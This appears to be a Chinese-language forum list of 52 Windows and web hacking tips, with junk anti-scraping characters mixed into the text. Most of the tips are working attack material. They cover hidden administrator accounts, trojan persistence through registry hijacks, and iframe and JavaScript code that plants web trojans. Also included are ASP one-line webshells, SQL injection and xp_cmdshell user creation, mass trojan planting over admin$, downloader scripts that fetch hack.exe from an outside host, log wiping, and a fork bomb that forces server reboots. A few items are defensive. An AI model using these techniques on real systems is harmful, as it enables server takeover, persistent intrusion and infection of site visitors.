Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 Y% z7 M8 B4 O( S
cacls C:\windows\system32 /G hqw20:R. B4 @& ]1 [1 ^5 T5 T; q
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入4 I* K0 T' V8 S
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
' O% H) c* S& H& S. j
. {5 b: |9 H0 [' g( g2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。" {6 f# | H8 t4 I: G& ~; P: y
5 }) c8 a, s; m4 J$ m1 l7 d' K
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。" P+ J% _* w/ M5 K8 J
3 D& {, L6 h" p- Z7 y4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
9 D6 q, `* L6 v1 v7 f, o4 ^
3 g/ L$ R3 W+ U0 ^0 D* U# N5、利用INF文件来修改注册表
\0 q; C5 r0 b. c6 x[Version]
( r3 t& f% A" H' Y, ~, OSignature="$CHICAGO$"% v# k4 Q& n% V: \2 t6 V
[Defaultinstall]' {) L: b* L9 w
addREG=Ating
8 i. K6 F7 O. Z6 Q# U8 Z1 J$ d[Ating]
; f' ^3 o; c5 n: y$ ?HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
3 W! i$ U& F6 V- g: T2 R2 f) C- N以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
9 @' ^& Y( F" b; Qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径* o: a7 G4 T8 E
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
2 k% ~9 s' |& n% Z' d+ K7 EHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU1 x% o: A5 V8 M6 M% j
HKEY_CURRENT_CONFIG 简写为 HKCC
3 V4 {' b! P; J0 A0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
/ r, G3 q% G2 D/ S: v9 V2 {"1"这里代表是写入或删除注册表键值中的具体数据
' z) j, Z/ S, [. f, Z4 x3 ~6 o* |5 o9 R
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
( R2 H$ R- P0 D0 \4 u- D" h$ }# o多了一步就是在防火墙里添加个端口,然后导出其键值4 G0 r6 N1 q6 l; Q5 u0 j' t) Y
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! \! V* h/ {) u3 N* U6 f
2 P8 O# N; |2 ~7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
. p* ^/ j Y* \3 l/ y, h在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。) h# x) t# o, ?- g, T5 y
9 g5 | U6 W. D6 o' R4 w0 {8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
* F& d8 Y: z5 A
! l( ]5 \# ]" ?9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
2 v, n7 Q. L6 }可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。2 B+ j5 S- P# W+ P" D l, L3 B
" b* e3 c+ F8 R& c2 K4 _% _, k
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”' D [ q& {9 r- i1 ?( _
$ w( p }" o/ o6 U; w: q' g3 |
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 x9 ?$ V% [/ W$ W4 b) B用法:xsniff –pass –hide –log pass.txt
$ g: x; p' F( n+ J" U! c- x- v$ T
# T7 k; o8 m4 p( [( E8 A12、google搜索的艺术
: p: F) K3 I! r& e' Y2 n搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”& U$ z+ ~1 J- U$ B* [# B
或“字符串的语法错误”可以找到很多sql注入漏洞。. a4 A' \( ` V; l# r
# ~6 ~" A: u4 M, ?13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
% d* A( ]3 ~, w8 Q) P8 V9 w8 ]9 D7 x# I$ h5 p$ I5 J7 @
14、cmd中输入 nc –vv –l –p 1987+ O: q6 ^: }5 n; N9 m/ T% d' k
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& K* ^+ O; I6 S( r( @6 h( O6 e0 E: j: E
15、制作T++木马,先写个ating.hta文件,内容为
- { }$ _* P! U7 C) e9 M' O/ H<script language="VBScript">1 q4 K; s$ \, ]. u1 V! ?. I. r- E+ g
set wshshell=createobject ("wscript.shell" )' R) o7 |/ d2 j, K) d
a=wshshell.run("你马的名称",1)
5 a0 ~3 ~! f% x4 h/ B7 fwindow.close
$ U8 X1 J3 X" \. c</script>9 Y, [9 j. O& ~+ b# W6 _
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。3 e* ~7 t8 G; A! H
* c! o# w3 y9 C; y! D/ [/ o2 _! ~( E16、搜索栏里输入
- o" J$ W7 a5 y# c, J6 G" i# I2 L3 Z关键字%'and 1=1 and '%'='
# A4 G" ^1 e/ H关键字%'and 1=2 and '%'='
! q" }" h9 C0 C6 n3 b比较不同处 可以作为注入的特征字符9 O& p' j2 M9 s4 B
, T$ X0 [- f6 a5 D5 _8 k$ t17、挂马代码<html>- H3 e) }2 u6 x, M
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; {: {3 ?# o& V& \- m# O</html>/ E P5 l, e( K* c% `! a$ e& {" U6 f
" ?# A+ b! f% q. P& M0 R
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,- y+ C2 j- [& r) n
net localgroup administrators还是可以看出Guest是管理员来。
3 B! H$ Q7 I+ [+ O2 T+ D
; M* q7 _9 |! K2 \1 Z9 |19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
0 b: ?% A! q- c [0 c- v2 D用法: 安装: instsrv.exe 服务名称 路径
7 [0 ^+ Y' z- T( @' `0 j卸载: instsrv.exe 服务名称 REMOVE
" c: P6 i+ q7 H3 U( [
' o0 Y d. J7 W# l3 X
: v+ `& `2 A7 l8 ?1 U2 u21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉: ?; Q* o4 W- ~/ w+ P
不能注入时要第一时间想到%5c暴库。
. a2 |* i+ e b+ A* E. T* [6 U- ?6 C5 r" E% k1 h
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( k% W2 J4 Q; x0 H1 b
! W9 q S' P1 {8 k3 h; X Z! o) x
23、缺少xp_cmdshell时
2 `' L+ I5 X" \4 _尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 ~! b P0 X5 F% ~& [假如恢复不成功,可以尝试直接加用户(针对开3389的)! I2 Z, t, x0 [ B4 b0 s
declare @o int& P* G4 N: S* o- H, D) t- j
exec sp_oacreate 'wscript.shell',@o out
) J# N8 W0 f# P4 ? v$ O* u- k5 vexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
, |& R- S$ l* M6 D7 l, `. f1 g7 L0 ^9 x
24.批量种植木马.bat+ [: ?8 A& a' I
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
8 e. m+ m6 Q, B2 R) vfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
- F2 F( S, B& I) h# I3 t扫描地址.txt里每个主机名一行 用\\开头0 _) O; l! H9 G# V! p" T5 V
+ @( ^/ a+ |1 G+ N) |25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。2 w9 d% h6 s* H" }
" Q1 ?3 G# N9 h+ O: y
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.5 u: @7 B% Z5 G- @) B9 _
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.. Z+ L' ~; f& i/ M3 {6 a
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! B# i+ s! P2 g; Q% [
" P( \0 B* O' ^4 f1 c; u27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP* f* }- a1 ^' D' U( D
然后用#clear logg和#clear line vty *删除日志4 Q) B$ t; ]9 n1 l/ {
; F0 z4 [3 |* w9 J( Z+ s1 D28、电脑坏了省去重新安装系统的方法
/ h( F w Q. ^; X) X5 u纯dos下执行,
, u2 O8 V) K$ X0 z8 F: {xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 m5 m+ x+ b( j* \
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
$ B8 ?+ J4 W1 l2 c7 f) ~* D2 O: y0 C% n" h% ~1 Z
29、解决TCP/IP筛选 在注册表里有三处,分别是:5 l* \/ a! L3 X7 y' P5 {* D9 M% {9 J
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. ~4 S8 ?) Q$ b& A: qHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% V7 n$ e' A$ }4 N( M/ A; f, V
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. `0 c6 f7 P" l# Z分别用$ x( ?+ _' @' I5 H
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ d! y; T X( G+ x& h/ hregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, k t' ?4 _; S( G! H' C' ?5 d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! B! s9 G( B. q2 {
命令来导出注册表项9 Y5 _ l4 _! j+ \" {7 d, e& s
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! P' _+ r! O! g/ `: e7 B改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# f; A* H- b( tregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
5 v3 o# i& M4 D w2 P7 O, }2 q! S& u- H6 o
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) l0 C# w' I9 g1 A
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3, L j- T2 X* V) c9 B% m9 \; F
% q# k, l6 I4 x! F. U- K31、全手工打造开3389工具# v2 d( \) ]$ C$ a! H9 ]: w
打开记事本,编辑内容如下:
+ p1 ?# l# S. |. a: fecho [Components] > c:\sql: _+ ?0 G! w6 P0 M' I
echo TSEnable = on >> c:\sql
3 u# ^4 U: w z1 B9 K0 w/ Isysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q" x+ z' U/ e; O, i/ u
编辑好后存为BAT文件,上传至肉鸡,执行- c% R. b7 r$ U2 C
. F8 [7 W* r3 p9 y
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! Y; \7 z$ W0 [ q4 |6 h
0 p$ h" ` ]+ X* f
33、让服务器重启* V {# s3 ~" J* V- d. T2 s
写个bat死循环:4 E! n9 z' }! R& Y
@echo off
4 _4 {: D2 ^- z9 ?8 { d- G: j:loop1
4 m Z3 I. Y. P6 P# U1 X; @( Tcls
( d2 L- I% E, F# y, }) [start cmd.exe
; b5 V- _/ M0 l+ mgoto loop1 R; T6 }4 I8 z) _- Y! x
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ J6 R# G* l/ V- y5 i. x# [4 R- \! P8 M) b
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,' M0 h M, Y! y- z w" j! j* |
@echo off& F1 H M( q$ H+ C- U. ]
date /t >c:/3389.txt
/ { l& v& b: S5 z; Ntime /t >>c:/3389.txt- `4 P3 z' D4 P3 M
attrib +s +h c:/3389.bat
" S' }; a: ?, b; [2 U$ nattrib +s +h c:/3389.txt! S6 k7 s* M3 ? c
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 o5 m% ~* s6 }8 b5 O8 o$ v9 X" Y并保存为3389.bat
( i; T% ?$ J& s, I& a9 r5 S5 G$ ^打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- f& x" c2 n0 s2 U
3 D/ v4 c3 Q$ d# P$ v35、有时候提不了权限的话,试试这个命令,在命令行里输入:
# c6 I8 [9 O2 z( s1 h9 \start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
" ^ n+ w5 ?( J+ K4 E }& [输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。0 K0 B n Q' D% c7 b
+ {2 v, _; D% F2 y& s36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ t8 R1 m3 l* z4 d) T6 O
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
/ C) i- M: K' Hecho 你的FTP账号 >>c:\1.bat //输入账号; ]. K5 s0 r8 ?3 O
echo 你的FTP密码 >>c:\1.bat //输入密码5 f8 G* x5 a& L' \* u
echo bin >>c:\1.bat //登入4 Q0 B% J4 P" a5 i3 i e5 m" r& m
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ ], W/ d5 W, o. X1 V
echo bye >>c:\1.bat //退出
$ P- J: r: G; {3 T% c1 L0 a然后执行ftp -s:c:\1.bat即可
* l! f) t% t/ b8 W. n; G. y0 { E7 k3 _5 d! P8 ?
37、修改注册表开3389两法9 L2 M6 q7 |' U, V$ P
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% Z0 s* p( j4 @ n5 h6 Zecho Windows Registry Editor Version 5.00 >>3389.reg
7 d' r7 G) }' r5 S* {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 X, ~/ v6 y7 r/ s( I/ L/ ~$ \. Xecho "Enabled"="0" >>3389.reg( q( Z' a' K5 f1 T, r2 E8 L% i; P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& y! t, o6 [/ l$ ]9 t3 P& k7 V+ \+ ONT\CurrentVersion\Winlogon] >>3389.reg! ^! N7 X1 z, |
echo "ShutdownWithoutLogon"="0" >>3389.reg
* c0 v- R3 V0 R# w) d4 Vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]2 |, {3 l: r, d' c/ H$ k# J
>>3389.reg
- A" x! y9 X6 ^9 K9 O' B" Vecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
# Q Y; J: Q% |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]+ N& Y) N# L4 E% ^7 |2 D& c. b6 R
>>3389.reg
/ ~7 l, v$ h! k0 N$ x! recho "TSEnabled"=dword:00000001 >>3389.reg& H2 {- R4 ]8 f, I; Y4 u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg2 M) Y2 t$ Q0 r+ ?5 ^ j8 q0 j: d
echo "Start"=dword:00000002 >>3389.reg
$ J& h6 v+ U4 g" U9 S( }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. I2 O1 l9 T6 [& ?! U/ j>>3389.reg
7 }! }% R. w6 O" U1 w* H5 {/ i7 r. vecho "Start"=dword:00000002 >>3389.reg
, a! f& L$ U9 \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg/ p6 Z: K- g6 O) S1 O6 w
echo "Hotkey"="1" >>3389.reg3 B; T$ X2 v6 e; Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 A( Y# A5 [# L6 h* V5 XServer\Wds\rdpwd\Tds\tcp] >>3389.reg
. o- \6 @4 B! O8 g+ qecho "PortNumber"=dword:00000D3D >>3389.reg: V% x/ z! h8 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: i5 B4 j5 p( S4 GServer\WinStations\RDP-Tcp] >>3389.reg! R4 N) I) e4 G' o- V9 @
echo "PortNumber"=dword:00000D3D >>3389.reg$ M! q3 r9 ^ ]$ i+ ?3 s
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。' X! U" `, N* J, b" `1 {, j9 F. f8 Q
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
% O7 V- ?- I( _# W9 \ w因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 k1 ]/ T8 ?; D4 r
(2)winxp和win2003终端开启
9 ~3 i3 x% j& q/ N6 K* C用以下ECHO代码写一个REG文件:; ]# g- U8 c4 i0 q- o$ p
echo Windows Registry Editor Version 5.00>>3389.reg
3 o: V5 C' v+ I) w% T8 W4 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; Q1 N1 l* G! C0 L2 d6 h) N$ C
Server]>>3389.reg2 J3 b6 x8 b1 ], W: m
echo "fDenyTSConnections"=dword:00000000>>3389.reg% n) R" C; H0 E4 x% h. g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" |- |! V l4 u, u* {2 n- A* _. E8 |
Server\Wds\rdpwd\Tds\tcp]>>3389.reg7 X4 H+ G7 |6 n# |' [; w1 ?
echo "PortNumber"=dword:00000d3d>>3389.reg
6 c6 A2 v$ s- S- ]' F, x1 {6 |3 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 P7 S6 b- J3 _ P# B6 w m
Server\WinStations\RDP-Tcp]>>3389.reg
8 X: c9 F0 m* gecho "PortNumber"=dword:00000d3d>>3389.reg6 _" i# V7 L: p6 [( H2 K
然后regedit /s 3389.reg del 3389.reg
* i% l3 t0 ]/ ?, hXP下不论开终端还是改终端端口都不需重启
' K+ n0 m$ z* L; A% Z" M4 U1 d/ n6 N) A. |& \5 ?; ~& ?- O$ Y# b1 O
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
5 f- B! v5 O+ @2 y; M用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 L2 c; @& B* ]9 v9 f$ v
$ I* @- o( q2 h) h( R4 y
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 ?4 I& @+ k& | S' h(1)数据库文件名应复杂并要有特殊字符
$ @( Y0 B' h9 T( G+ b* ^3 o(2)不要把数据库名称写在conn.asp里,要用ODBC数据源2 M7 o3 {. F- u6 F, Z( x. R
将conn.asp文档中的
+ R* ?5 P( i4 P2 l: ADBPath = Server.MapPath("数据库.mdb")' O( W1 D! O( j* m3 t/ R9 j. ?
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath( T4 {2 d9 I) d. s: c
/ u2 Z8 c) a4 b- n1 V: w6 {
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置' n3 y0 y6 b9 S3 P" n
(3)不放在WEB目录里: p1 g1 b0 \: |3 h& `
% N4 z# S+ h g) {( q9 W0 ^+ j40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉% r0 {7 [* W% g
可以写两个bat文件
1 X0 e0 f' W' s@echo off# K. z! s9 _) G# \: ~
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) M: V3 s" b" z3 |* A9 b. k
@del c:\winnt\system32\query.exe
: A4 R3 }7 ?( I@del %SYSTEMROOT%\system32\dllcache\query.exe& @/ x* W9 {5 m3 d3 H5 R
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
7 t: q$ o% H* I3 R1 O
/ b U/ q+ D9 {# c7 m' ^ e@echo off7 `8 I0 v% D" R+ m
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
5 X* V' G/ Q" U' c1 B9 E@del c:\winnt\system32\tsadmin.exe
: s8 N2 @% T9 O' S@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 H4 I1 \/ {" \5 k+ p0 V1 z; K, l, e7 m$ }$ H
41、映射对方盘符
; a! C: h1 f7 ]" Ptelnet到他的机器上,
( ^1 _2 g3 u6 _4 t9 Inet share 查看有没有默认共享 如果没有,那么就接着运行
4 p' D$ h! ?# \% jnet share c$=c:; R: w8 Y$ v( u& r
net share现在有c$: w( i! k {+ D
在自己的机器上运行1 M4 @- Y! J" L9 u8 Q. I
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K6 h9 H% ?4 Z* ?. u
% Z+ V- z. O5 T2 P9 ]42、一些很有用的老知识( X: l% r- w& M z
type c:\boot.ini ( 查看系统版本 )
- M3 C8 j# }8 P. v' d O) j Q5 snet start (查看已经启动的服务)4 `9 F" p) e. c* y
query user ( 查看当前终端连接 )
, k8 I. r2 q2 X: z! R# Wnet user ( 查看当前用户 )
# K% u; n4 d7 f8 D( l$ Vnet user 用户 密码/add ( 建立账号 )
/ K6 v4 V2 k9 b6 i& L2 }# u7 Unet localgroup administrators 用户 /add (提升某用户为管理员)" P+ K4 c9 i* ]! W- i" J8 f0 ~+ J
ipconfig -all ( 查看IP什么的 ) P9 {! v5 l; x3 y, U: _3 W' F
netstat -an ( 查看当前网络状态 )* ^$ r$ n5 i7 I) M ^/ @6 }
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码). M) X0 ]3 k: s& F: o' a( n
克隆时Administrator对应1F4* {% Y- j5 d) P ^: s
guest对应1F5: w, l- w6 q# ~
tsinternetuser对应3E8( E4 P, ~% f, g3 K$ w
7 W% z6 ^8 Q4 F% S4 Z2 v
43、如果对方没开3389,但是装了Remote Administrator Service
! z& g5 H! j9 z: o% j4 k" c用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接# r! `1 J( n4 S: z3 m6 w
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
, V9 b9 @( C# n( q" b4 H M先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"& [3 D* X& r! d
0 q7 j0 O% N8 `7 d44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)6 o5 _. K4 C& p, f, q6 F; {
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ x5 _; O: z3 p w. k, k1 r; B G r! H
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
5 }) f% g' ]' y1 Z! y; Eecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
! `% g6 I6 E5 [( C* e1 M^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
E8 L: |" k( {CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =) G/ R& i- W+ s; p! I) ]
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs6 M k* B- S2 `/ G1 a
(这是完整的一句话,其中没有换行符), x) `6 p# g/ t+ I' Z! n e
然后下载:; Q1 |" \& |3 l9 \; l% Z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe, l# g5 Q# u+ w$ c% y
( u" f( @1 F$ A7 ^: D' H
46、一句话木马成功依赖于两个条件:
( H" _. ~; V+ O- o5 v* q8 i1、服务端没有禁止adodb.Stream或FSO组件
, a4 k, S V4 r% d, b2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 c5 U2 w, | K7 ~2 H4 B% h+ M
0 D8 }; K% R# ^8 {' w. ~
47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 {9 M, w% F& P+ u
;alter database utsz set RECOVERY FULL--
- y2 Q, v+ E" C1 u+ v' z;create table cmd (a image)--
6 B1 M# ?: K, v- ^# Z- D;backup log utsz to disk = 'D:\cmd' with init--0 a* ^! @0 Z8 e: [# s. K0 u
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- U' ]9 J5 k0 J7 W
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, g( u4 u6 L. }+ h, O8 `3 k& g
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 E# J: H; b/ a7 ^) d i+ H9 V# j+ z. F: T) i6 N
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 E4 [9 u/ ]) x8 g% R/ W' `
5 K1 V3 o5 m2 P4 d
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
/ b6 H+ {. W/ q+ r& U$ B所有会话用 'all'。" y" G) H- m q1 Q: {, w+ ?! T
-s sessionid 列出会话的信息。
8 r# Q) s& q8 q S0 e-k sessionid 终止会话。
. B" o- O& i# }5 t& ^% G& T-m sessionid 发送消息到会话。
5 s8 e. A" K: [1 h. Q1 s) h
$ R$ S+ \$ u$ [9 K: Hconfig 配置 telnet 服务器参数。
; K6 v: B( Q0 g. G9 ^) `1 \3 A, ^" c: Q7 h& W
common_options 为:6 C8 w0 A% q s; o0 H
-u user 指定要使用其凭据的用户' T' ~$ |* A7 a8 u
-p password 用户密码2 S& M0 ?( a) k$ E
9 Z6 B5 |$ U1 b( l5 b2 ^$ L7 R6 K1 x
config_options 为:+ U3 D3 R( f3 k3 g; }% h/ y
dom = domain 设定用户的默认域
: X6 U! @ k0 `" {5 T s- Kctrlakeymap = yes|no 设定 ALT 键的映射
: S" R/ K" } `3 G. Xtimeout = hh:mm:ss 设定空闲会话超时值
' [- F0 }; j+ x, ltimeoutactive = yes|no 启用空闲会话。
6 Y3 z9 y; Z$ Fmaxfail = attempts 设定断开前失败的登录企图数。( o. F, [9 T$ D$ c2 Q1 @$ T
maxconn = connections 设定最大连接数。
: c# x* l; ?# c! g% `port = number 设定 telnet 端口。
- |, [( j, Y; [0 a; ?- ysec = [+/-]NTLM [+/-]passwd
% _$ d& W- h6 d F7 j/ @设定身份验证机构$ X6 T- J# P1 a' h
fname = file 指定审计文件名。: q$ \5 i w6 h+ ]& |
fsize = size 指定审计文件的最大尺寸(MB)。
3 q7 s- m7 R5 G$ R. d! v+ {mode = console|stream 指定操作模式。
H* o ?6 h$ U2 yauditlocation = eventlog|file|both
7 y. s% Z6 s# ~: F指定记录地点+ b* o1 l! Y% U1 _ \. z4 f
audit = [+/-]user [+/-]fail [+/-]admin
5 n# N1 A/ y2 ^) \( b+ k1 a
& K% ?5 i, w8 G# `% F. e49、例如:在IE上访问:0 _. A$ x$ W- k) L6 e# q5 z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
0 @) f* Q4 m* e6 D/ p* ~% {hack.txt里面的代码是:4 q( r6 i! J6 J$ a0 ?- Z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"> ~5 J$ s6 K, l/ ]: i; ?
把这个hack.txt发到你空间就可以了!* @0 K! ^, i# i* d3 V! M
这个可以利用来做网马哦!
" q0 B2 v: M" {* y) p1 l/ E1 _5 g, i9 Y: l. v9 |
50、autorun的病毒可以通过手动限制!
- O* F) X7 G! g8 Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
/ n2 u+ U C4 @. C* d: L2,打开盘符用右键打开!切忌双击盘符~
- B+ T; C: Y2 [, v& l" [3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
7 |9 C# X, u/ F1 e* k- H, S
7 U+ N: I* D' Y. m51、log备份时的一句话木马:! L0 x: `( h) m$ ]) o [& D
a).<%%25Execute(request("go"))%%25>, |$ [) l) r' m9 V, o0 x* l; G: \9 Y* }
b).<%Execute(request("go"))%>
" s9 L. S+ L' e/ K) p/ }2 f3 nc).%><%execute request("go")%><%
/ T; A r& V3 Q! j9 L- ?d).<script language=VBScript runat=server>execute request("sb")</Script>
! w2 M, p' Q% ae).<%25Execute(request("l"))%25>
0 z( O9 B. r) w' t( ?9 Z. B3 }f).<%if request("cmd")<>"" then execute request("pass")%>
5 e% Q ^. K- b0 O3 S, `: n$ e+ D1 g! T/ J2 V2 C9 G
52、at "12:17" /interactive cmd
